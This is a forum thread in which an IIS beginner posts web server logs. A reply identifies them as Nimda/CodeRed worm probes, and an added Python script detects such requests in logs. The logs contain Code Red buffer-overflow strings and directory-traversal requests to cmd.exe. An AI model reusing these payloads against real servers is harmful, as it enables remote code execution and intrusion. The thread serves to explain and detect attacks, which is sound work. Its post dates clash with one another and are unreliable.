January 3, 2003
217.208.52.72, -, 2003-05-10, 15:05:40, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.208.52.72, -, 2003-05-10, 15:29:12, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 72, 4201, 404, 3, GET, /scripts/root.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 20, 70, 4201, 404, 2, GET, /MSADC/root.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 80, 4201, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 80, 4201, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 117, 4201, 404, 3, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 117, 4201, 404, 3, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 97, 4201, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 97, 4201, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 97, 4201, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 97, 4201, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
217.208.52.72, -, 2003-05-10, 16:09:28, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.44.144.174, -, 2003-05-10, 16:23:26, W3SVC1, LAPPEN, 192.168.0.37, 90, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
What does all that mean? Is someone messing with my web server, and is that completely normal? I'm a bit of a beginner with IIS, so I'd be grateful for an explanation of what this means.
/Cyrgo
July 2, 2001
That is Nimda, CodeRed or something similar. They look for unpatched Windows machines and try to exploit known holes in the IIS server. If they find such a machine, they copy themselves onto it and in turn look for new machines, and so on.
If you run a Windows machine with an unpatched IIS, it means that anyone can run any program on your computer, even log on to your computer and do anything!
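Added example, not part of the thread: a small Python triage script that reads logs in the comma-separated IIS layout shown in the question, groups worm-style requests by client address, and counts how many were answered with a 2xx status instead of the 404/500 seen above. The sample lines, addresses, host name and the `classify`/`scan` function names are constructed for illustration.

```python
import csv
from collections import defaultdict

# Constructed sample in the same comma-separated IIS log layout as the post
# (addresses are documentation ranges; the long query string is shortened).
SAMPLE_LOG = """\
198.51.100.7, -, 2003-05-10, 15:05:40, W3SVC1, WEB01, 192.0.2.10, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXX%u9090%u6858=a,
203.0.113.9, -, 2003-05-10, 16:08:30, W3SVC1, WEB01, 192.0.2.10, 0, 72, 4201, 404, 3, GET, /scripts/root.exe, /c+dir,
203.0.113.9, -, 2003-05-10, 16:08:30, W3SVC1, WEB01, 192.0.2.10, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
203.0.113.9, -, 2003-05-10, 16:09:02, W3SVC1, WEB01, 192.0.2.10, 0, 80, 1024, 200, 0, GET, /index.html, -,
"""

def classify(target, params):
    """Label a request by the worm family its shape matches, or None."""
    t = target.lower()
    if t.endswith(".ida") and "%u" in params.lower():
        return "codered-style"   # filler plus %u-encoded data sent to the .ida handler
    if t.endswith(("/cmd.exe", "/root.exe")):
        return "nimda-style"     # tries to reach a command shell through the web root
    return None

def scan(text):
    """Return {client_ip: {"kinds": set, "hits": int, "served": int}}."""
    report = defaultdict(lambda: {"kinds": set(), "hits": 0, "served": 0})
    for row in csv.reader(text.splitlines(), skipinitialspace=True):
        if len(row) < 15:
            continue  # skip blank or truncated lines
        # Field order: client IP is 0, HTTP status 10, target 13, parameters 14.
        ip, status, target, params = row[0], row[10], row[13], row[14]
        kind = classify(target, params)
        if kind is None:
            continue
        entry = report[ip]
        entry["kinds"].add(kind)
        entry["hits"] += 1
        if status.startswith("2"):
            entry["served"] += 1  # the server answered the probe: check patch level
    return dict(report)

if __name__ == "__main__":
    for ip, e in scan(SAMPLE_LOG).items():
        print(ip, sorted(e["kinds"]), "hits:", e["hits"], "2xx:", e["served"])
```

A non-zero 2xx count for any address is the case to follow up on; probes that only produce 404 or 500, as in the log above, were not served.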